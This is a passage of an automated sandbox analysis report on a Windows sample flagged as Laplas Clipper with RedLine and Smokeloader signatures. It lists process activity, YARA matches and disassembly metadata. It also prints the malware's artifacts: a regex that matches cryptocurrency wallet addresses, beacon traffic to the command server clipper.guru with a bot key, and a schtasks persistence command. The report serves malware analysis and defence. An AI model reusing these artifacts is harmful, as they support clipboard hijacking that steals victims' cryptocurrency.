^(?:(1[1-9A-HJ-NP-Za-km-z]{33})\|(3[1-9A-HJ-NP-Za-km-z]{33})\|(bc1q[023456789acdefghjklmnpqrstuvwxyz]{38,58})\|(q[a-z0-9]{41})\|(p[a-z0-9]{41})\|(L[a-km-zA-HJ-NP-Z1-9]{33})\|(M[a-km-zA-HJ-NP-Z1-9]{33})\|(ltc1q[a-km-zA-HJ-NP-Z1-9]{38})\|(0x[a-fA-F0-9]{40})\|(D[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32})\|(4[0-9AB][1-9A-HJ-NP-Za-km-z]{93})\|(8[0-9AB][1-9A-HJ-NP-Za-km-z]{93})\|(r[0-9a-zA-Z]{33})\|(t1[a-km-zA-HJ-NP-Z1-9]{33})\|(X[1-9A-HJ-NP-Za-km-z]{33})\|(ronin:[a-fA-F0-9]{40})\|(T[A-Za-z1-9]{33})\|(http[s]*:\/\/steamcommunity.com\/tradeoffer\/new\/\?partner=([0-9]+)&token=([a-zA-Z0-9]+))\|(tz[1-3][1-9A-HJ-NP-Za-km-z]{33})\|(addr1[a-z0-9]+)\|(cosmos1[a-z0-9]{38})\|(R[a-zA-Z0-9]{33})\|([A-Z2-7]{58})\|([1-9A-HJ-NP-Za-km-z]{44}))$
Nov 27, 2022 18:21:57.549923897 CET	93	OUT	GET /bot/online?guid=computer\user&key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdb HTTP/1.1 Host: clipper.guru User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
Nov 27, 2022 18:21:57.584654093 CET	93	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sun, 27 Nov 2022 17:21:57 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: keep-alive Data Raw: 6f 6b Data Ascii: ok
Nov 27, 2022 18:22:27.682094097 CET	93	OUT	Data Raw: 00 Data Ascii:

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Ao88ZLN0Wi.exePID: 5536, Parent PID: 3528

General

Target ID:	0
Start time:	18:19:53
Start date:	27/11/2022
Path:	C:\Users\user\Desktop\Ao88ZLN0Wi.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Ao88ZLN0Wi.exe
Imagebase:	0x400000
File size:	2311168 bytes
MD5 hash:	24774C7B900E0A51DF665776B502CFC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.526585890.0000000002AE8000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_LaplasClipper, Description: Yara detected Laplas Clipper, Source: 00000000.00000002.527410614.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.527410614.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_LaplasClipper, Description: Yara detected Laplas Clipper, Source: 00000000.00000002.523036860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_LaplasClipper, Description: Yara detected Laplas Clipper, Source: 00000000.00000003.315139514.00000000031B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2040, Parent PID: 5536

General

Target ID:	3
Start time:	18:21:31
Start date:	27/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C schtasks /create /tn jicTFBavsm /tr C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f
Imagebase:	0xd90000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5308, Parent PID: 2040

General

Target ID:	4
Start time:	18:21:31
Start date:	27/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 3216, Parent PID: 2040

General

Target ID:	5
Start time:	18:21:32
Start date:	27/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /tn jicTFBavsm /tr C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f
Imagebase:	0xb0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: PNcznLwIMl.exePID: 5376, Parent PID: 1088

General

Target ID:	6
Start time:	18:21:41
Start date:	27/11/2022
Path:	C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe
Imagebase:	0x400000
File size:	774832757 bytes
MD5 hash:	6CE4DAC5A778F8E717E5C9C1222AE0DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.640977716.0000000002B6A000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_LaplasClipper, Description: Yara detected Laplas Clipper, Source: 00000006.00000003.563123119.0000000003230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LaplasClipper, Description: Yara detected Laplas Clipper, Source: 00000006.00000002.641488650.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.641488650.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_LaplasClipper, Description: Yara detected Laplas Clipper, Source: 00000006.00000002.637980039.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Ao88ZLN0Wi.exePID: 5536, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	50%
Total number of Nodes:	12
Total number of Limit Nodes:	1

Executed Functions

Function 02AE87C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02AE87EE
Module32First.KERNEL32(00000000,00000224), ref: 02AE880E

Memory Dump Source

Source File: 00000000.00000002.526585890.0000000002AE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ae8000_Ao88ZLN0Wi.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 1882f94ae9c3fa7d76957bd3f29f530f28531c839390e4b96d993be98ed283af
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: F8F09631200710AFEB203BF5A8CDB6E76E8EF49765F100528E653910D0DF74E8464A61

Uniqueness

Uniqueness Score: -1.00%

Function 02AE8485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02AE84D6

Memory Dump Source

Source File: 00000000.00000002.526585890.0000000002AE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ae8000_Ao88ZLN0Wi.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: b771321609bb6ba72203f6656e79ad426228ba6a9be0d3212e04da1ddef1199d
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 33113C79A40208EFDB01DF98CA85E99BBF5AF08350F058094F9499B361D775EA90DF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02AECCA9 Relevance: .2, Instructions: 214
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.526585890.0000000002AE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ae8000_Ao88ZLN0Wi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62e1158471b7eb70dd8c1a9e5032e757a919d5887912291ad71b4c144d2de6c0
Instruction ID: 9e51e401d1d8c2dfd8f22b8b85de5f67bb4bd4bcaf117634967227ca23faa2ce
Opcode Fuzzy Hash: 62e1158471b7eb70dd8c1a9e5032e757a919d5887912291ad71b4c144d2de6c0
Instruction Fuzzy Hash: 656158766196D18BCB1A9F3488D62E6BFB2EF4723431851EEC4838F053DB219817CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02AECD62 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.526585890.0000000002AE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ae8000_Ao88ZLN0Wi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 800a1d1e67efbe94e5de44804bc6d9cd72cc7fa1e124b946da0522f0e06e0f23
Instruction ID: 5754dc0ef0d46c04e2256187a1bf6a97094e636682cca94c4d0cbf65808dda78
Opcode Fuzzy Hash: 800a1d1e67efbe94e5de44804bc6d9cd72cc7fa1e124b946da0522f0e06e0f23
Instruction Fuzzy Hash: FC515A77A496804FCB169F3499C62A6BFA2EF4723432841DFC8928F162D7219507CF81

Uniqueness

Uniqueness Score: -1.00%

Function 02AE80A3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.526585890.0000000002AE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ae8000_Ao88ZLN0Wi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: dbd7c7c18f41c905d3ff9912f81445212116db578d9c7086dfd36f48b4c24c68
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 7611A5723401009FDB54DF59DCC0FA673EAEB89360B198165ED09CB326DB79E842C760

Uniqueness

Uniqueness Score: -1.00%

Function 004344D0 Relevance: 11.4, Strings: 9, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%, xrefs: 004347F4
runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptls: unsupported certificate key (%T)too many Additionals to pack (>65535)t, xrefs: 004347EB
bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status gcBitsArenasgcpacertracegetaddrinfowharddecommithost is downhttp2debug=1http2deb, xrefs: 004346DA
CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscallfailed to parse certificate #%d in the chain: %wnot enough significant bits after mult64bitPow10out points to big.In, xrefs: 00434790
runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state , xrefs: 0043475C
runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected g statusunknown Go type: %vunknown certificateunknown ciphe, xrefs: 0043466B
runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not, xrefs: 004347B7
VirtualQuery for stack base failedadding nil Certificate to CertPoolbad scalar length: %d, expected %dchacha20: wrong HChaCha20 key sizecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00434735
runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00434701

Memory Dump Source

Source File: 00000000.00000002.523036860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.526228807.0000000000888000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.526267127.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.526275898.00000000008A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.526283004.00000000008AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.526289284.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Ao88ZLN0Wi.jbxd

Yara matches

Similarity

API ID:
String ID: %$CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscallfailed to parse certificate #%d in the chain: %wnot enough significant bits after mult64bitPow10out points to big.In$VirtualQuery for stack base failedadding nil Certificate to CertPoolbad scalar length: %d, expected %dchacha20: wrong HChaCha20 key sizecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status gcBitsArenasgcpacertracegetaddrinfowharddecommithost is downhttp2debug=1http2deb$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptls: unsupported certificate key (%T)too many Additionals to pack (>65535)t$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected g statusunknown Go type: %vunknown certificateunknown ciphe
API String ID: 0-1892859790
Opcode ID: 81c8aaa827b8e7a4a794f457c4aa92b1ff7cb8f950fbae5d61ffae75df7f8997
Instruction ID: 97a2742ff01ef203ad5d99b55a71c64387ec382574260d99872501978e8d95ac
Opcode Fuzzy Hash: 81c8aaa827b8e7a4a794f457c4aa92b1ff7cb8f950fbae5d61ffae75df7f8997
Instruction Fuzzy Hash: 188112B44097419FD300EF65C09575ABBE0BF89718F00992EE48887392EBB8E944CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00444230 Relevance: 5.1, Strings: 4, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

releasep: m=remote errorruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptshort bufferspanSetSpinesweepWaiterstraceStringstransmitfileunexpected )unknown portwirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flushedWork id, xrefs: 004442C9
releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br, xrefs: 00444381
p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad RequestClassHESIODCloseHandleCreateF, xrefs: 00444337
m->p= max= min= next= p->m= prev= span=% util(...), i = , not , val .local.onion390625<-chanAcceptAnswerArabicAugustBasic BrahmiCANCELCarianChakmaCommonCookieCopticExpectFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLy, xrefs: 004442EB

Memory Dump Source

Source File: 00000000.00000002.523036860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.526228807.0000000000888000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.526267127.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.526275898.00000000008A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.526283004.00000000008AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.526289284.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Ao88ZLN0Wi.jbxd

Yara matches

Similarity

API ID:
String ID: m->p= max= min= next= p->m= prev= span=% util(...), i = , not , val .local.onion390625<-chanAcceptAnswerArabicAugustBasic BrahmiCANCELCarianChakmaCommonCookieCopticExpectFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLy$ p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad RequestClassHESIODCloseHandleCreateF$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br$releasep: m=remote errorruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptshort bufferspanSetSpinesweepWaiterstraceStringstransmitfileunexpected )unknown portwirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flushedWork id
API String ID: 0-2241517763
Opcode ID: 79d898dc659ba42dd8618e759383c1f9b62ccaae4d79689c2f13df296d38aa82
Instruction ID: 3398a6dde8fbd75b79657cbc87c49647842c40cd3a331f4d71b71db5c569ec6e
Opcode Fuzzy Hash: 79d898dc659ba42dd8618e759383c1f9b62ccaae4d79689c2f13df296d38aa82
Instruction Fuzzy Hash: 2C3116B45087408FD300EF25D19475ABBE0BF88318F05986EE88887312D778E888DFA6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: PNcznLwIMl.exePID: 5376, Parent PID: 1088COMMON

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	1

Executed Functions

Function 02B6A7C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02B6A7EE
Module32First.KERNEL32(00000000,00000224), ref: 02B6A80E

Memory Dump Source

Source File: 00000006.00000002.640977716.0000000002B6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2b6a000_PNcznLwIMl.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 7b90932d207dcf469d800b070d871bcc42590aeaca058f28cb315b5bffb12a9d
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: C1F062312007116FDB203BB5A88DB7A76F8FF49625F104568E642A14C0DBB4E8468A61

Uniqueness

Uniqueness Score: -1.00%

Function 02B6A485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02B6A4D6

Memory Dump Source

Source File: 00000006.00000002.640977716.0000000002B6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2b6a000_PNcznLwIMl.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 4e4825391da785d3a0f9e56d5a47e9c49a788650e7b2fb324e1db21ed4448aae
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: FC112D79A00208EFDB01DF98C985E99BBF5AF08350F058094F948AB361D375EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004344D0 Relevance: 11.4, Strings: 9, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not, xrefs: 004347B7
bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status gcBitsArenasgcpacertracegetaddrinfowharddecommithost is downhttp2debug=1http2deb, xrefs: 004346DA
runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state , xrefs: 0043475C
%, xrefs: 004347F4
VirtualQuery for stack base failedadding nil Certificate to CertPoolbad scalar length: %d, expected %dchacha20: wrong HChaCha20 key sizecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00434735
runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected g statusunknown Go type: %vunknown certificateunknown ciphe, xrefs: 0043466B
CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscallfailed to parse certificate #%d in the chain: %wnot enough significant bits after mult64bitPow10out points to big.In, xrefs: 00434790
runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00434701
runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptls: unsupported certificate key (%T)too many Additionals to pack (>65535)t, xrefs: 004347EB

Memory Dump Source

Source File: 00000006.00000002.637980039.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.639724310.0000000000888000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.639740293.000000000088D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.639759562.00000000008A8000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.639774074.00000000008B1000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PNcznLwIMl.jbxd

Yara matches

Similarity

API ID:
String ID: %$CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscallfailed to parse certificate #%d in the chain: %wnot enough significant bits after mult64bitPow10out points to big.In$VirtualQuery for stack base failedadding nil Certificate to CertPoolbad scalar length: %d, expected %dchacha20: wrong HChaCha20 key sizecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status gcBitsArenasgcpacertracegetaddrinfowharddecommithost is downhttp2debug=1http2deb$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptls: unsupported certificate key (%T)too many Additionals to pack (>65535)t$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected g statusunknown Go type: %vunknown certificateunknown ciphe
API String ID: 0-1892859790
Opcode ID: 81c8aaa827b8e7a4a794f457c4aa92b1ff7cb8f950fbae5d61ffae75df7f8997
Instruction ID: 97a2742ff01ef203ad5d99b55a71c64387ec382574260d99872501978e8d95ac
Opcode Fuzzy Hash: 81c8aaa827b8e7a4a794f457c4aa92b1ff7cb8f950fbae5d61ffae75df7f8997
Instruction Fuzzy Hash: 188112B44097419FD300EF65C09575ABBE0BF89718F00992EE48887392EBB8E944CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00444230 Relevance: 5.1, Strings: 4, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br, xrefs: 00444381
m->p= max= min= next= p->m= prev= span=% util(...), i = , not , val .local.onion390625<-chanAcceptAnswerArabicAugustBasic BrahmiCANCELCarianChakmaCommonCookieCopticExpectFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLy, xrefs: 004442EB
p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad RequestClassHESIODCloseHandleCreateF, xrefs: 00444337
releasep: m=remote errorruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptshort bufferspanSetSpinesweepWaiterstraceStringstransmitfileunexpected )unknown portwirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flushedWork id, xrefs: 004442C9

Memory Dump Source

Source File: 00000006.00000002.637980039.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.639724310.0000000000888000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.639740293.000000000088D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.639759562.00000000008A8000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.639774074.00000000008B1000.00000040.00000001.01000000.00000004.sdmpDownload File

